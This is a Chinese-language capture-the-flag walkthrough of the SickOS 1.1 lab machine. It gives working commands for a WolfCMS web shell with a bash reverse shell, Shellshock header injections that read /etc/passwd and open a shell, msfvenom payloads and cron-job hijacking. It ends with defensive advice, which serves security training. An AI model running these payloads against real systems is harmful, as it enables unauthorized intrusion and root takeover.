SickOS 1.1 渗透测试实战教学文档

一、靶机概述

SickOS 1.1 是一个基于 Ubuntu 12.04.4 LTS 的渗透测试练习靶机，运行 Linux 3.11.0-15-generic 内核。该系统存在多个安全漏洞，适合用于学习渗透测试技术。

二、环境准备

1. 下载靶机镜像：
   • 下载地址：https://download.vulnhub.com/sickos/sick0s1.1.7z
2. 设置网络环境：
   • 确保攻击机和靶机在同一网络段（如192.168.239.0/24）
3. 攻击机工具准备：
   • nmap
   • dirb/gobuster
   • netcat
   • curl
   • msfvenom
   • nikto

三、渗透测试流程

1. 信息收集

主机发现

sudo nmap -sn 192.168.239.0/24

发现靶机IP：192.168.239.133

端口扫描

sudo nmap --min-rate 10000 -p- 192.168.239.133

发现开放端口：

• 22/tcp - SSH
• 3128/tcp - squid-http (代理服务)
• 8080/tcp - http-proxy (关闭)

服务版本探测

sudo nmap -sT -sV -O -p 22,3128,8080 192.168.239.133

关键信息：

• OpenSSH 5.9p1
• Squid http proxy 3.1.19
• 系统：Linux 3.2 - 4.9

2. Web服务分析

代理服务器配置

3128端口运行Squid代理服务，可通过浏览器或curl设置代理访问：

curl -v --proxy http://192.168.239.133:3128 http://192.168.239.133/

目录爆破

使用dirb通过代理进行目录扫描：

sudo dirb http://192.168.239.133 -p http://192.168.239.133:3128

发现重要路径：

• /cgi-bin/ (403)
• /connect (200)
• /index.php (200)
• /robots.txt (200)
• /wolfcms (通过robots.txt发现)

robots.txt内容

User-agent: *
Disallow: /
Dissalow: /wolfcms

3. WolfCMS漏洞利用

发现管理后台

通过Google搜索发现WolfCMS默认管理路径为/?/admin，尝试访问：

http://192.168.239.133/wolfcms/?/admin

暴力破解登录

尝试默认凭证：

• 用户名：admin
• 密码：admin (成功)

上传Web Shell

在插件管理页面插入PHP代码：

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.239.128/443 0>&1'");?>

获取反弹Shell

攻击机监听：

sudo nc -lvnp 443

访问包含恶意代码的页面获取www-data权限的shell。

4. 权限提升

信息收集

查看配置文件发现数据库凭证：

cat /var/www/wolfcms/config.php

内容：

define('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306');
define('DB_USER', 'root');
define('DB_PASS', 'john@123');

SSH登录尝试

发现系统用户sickos，尝试使用相同密码：

ssh sickos@192.168.239.133

密码：john@123 (成功)

检查sudo权限

sudo -l

显示sickos用户可以无限制使用sudo：

User sickos may run the following commands on this host:
    (ALL : ALL) ALL

获取root权限

sudo /bin/bash

成功获得root权限，在/root目录下找到flag文件。

5. 替代攻击路径：Shellshock漏洞利用

漏洞扫描

使用nikto扫描：

sudo nikto -h 192.168.239.133 -useproxy http://192.168.239.133:3128

发现/cgi-bin/status存在Shellshock漏洞（CVE-2014-6271）。

漏洞验证

curl -v --proxy http://192.168.239.133:3128 http://192.168.239.133/cgi-bin/status -H "user-agent:echo; echo; /bin/bash -c 'cat /etc/passwd'"

获取反弹Shell

生成payload：

sudo msfvenom -p cmd/unix/reverse_bash lhost=192.168.239.129 lport=443 -f raw

执行攻击：

curl -v --proxy http://192.168.239.133:3128 http://192.168.239.133/cgi-bin/status -H "user-agent:echo; echo; /bin/bash -c '0<&94-;exec 94<>/dev/tcp/192.168.239.129/443;sh <&94 >&94 2>&94'"

6. 通过定时任务提权

发现定时任务

cat /etc/cron.d/automate

内容：

* * * * * root /usr/bin/python /var/www/connect.py

篡改connect.py

生成Python反向shell：

sudo msfvenom -p cmd/unix/reverse_python lhost=192.168.239.129 lport=448 -f raw

替换/var/www/connect.py内容为恶意代码。

获取root shell

监听448端口，等待定时任务执行后获取root权限。

四、关键知识点总结

1. Squid代理服务：可以作为中间人访问被限制的Web内容
2. 目录爆破技巧：通过代理进行目录扫描
3. CMS漏洞利用：
   • 默认凭证攻击
   • 后台文件上传获取Web Shell
4. Shellshock漏洞：
   • CGI脚本中的Bash漏洞利用
   • 通过HTTP头注入恶意命令
5. 权限提升方法：
   • 配置文件信息泄露
   • Sudo权限滥用
   • 定时任务劫持
6. 反弹Shell技术：
   • Bash反向Shell
   • Python反向Shell
   • 通过多种协议建立连接

五、防御建议

1. 及时更新系统和软件补丁
2. 避免使用默认或弱密码
3. 限制sudo权限，遵循最小权限原则
4. 对CGI脚本进行安全审计
5. 监控系统关键文件和目录的变更
6. 使用安全的目录权限设置
7. 定期检查cron任务和系统服务

六、Flag内容

成功获取root权限后，在/root目录下发现flag文件：

If you are viewing this!! ROOT!
You have Succesfully completed SickOS1.1.
Thanks for Trying

通过本靶机的练习，可以全面掌握从信息收集到权限提升的完整渗透测试流程，特别是Web应用和系统层面的多种漏洞利用技术。